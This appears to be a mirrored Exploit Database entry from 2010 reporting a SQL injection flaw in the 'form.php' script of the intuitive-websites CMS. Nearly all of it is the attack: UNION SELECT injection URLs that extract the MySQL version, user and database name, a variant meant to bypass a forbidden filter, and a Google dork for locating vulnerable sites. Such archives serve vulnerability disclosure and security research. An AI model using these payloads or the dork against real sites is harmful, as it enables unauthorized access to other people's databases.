intuitive – ‘form.php’ SQL Injection

• Exploit Database
• 6 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2010-02-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11481/

• intuitive (form.php) Sql Injection Vulnerability
  ==============================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
  .:. Home : www.sec-attack.com/vb [Sec Attack Team]
  .:. Script : http://www.intuitive-websites.com/
  .:. Bug Type : Sql Injection[Mysql]
  .:. Dork : "site powered by intuitive-websites.com"
  
  ####################################################################
  
  ===[ Exploit ]===
  
  www.site.com/form.php?id=null[Sql]
  
  www.site.com/form.php?id=-null+union+select+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17
  
  T0 Bypass Forbidden
  
  www.site.com/form.php?id=-null+UNION+ALL+SELECT+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17
  
  ####################################################################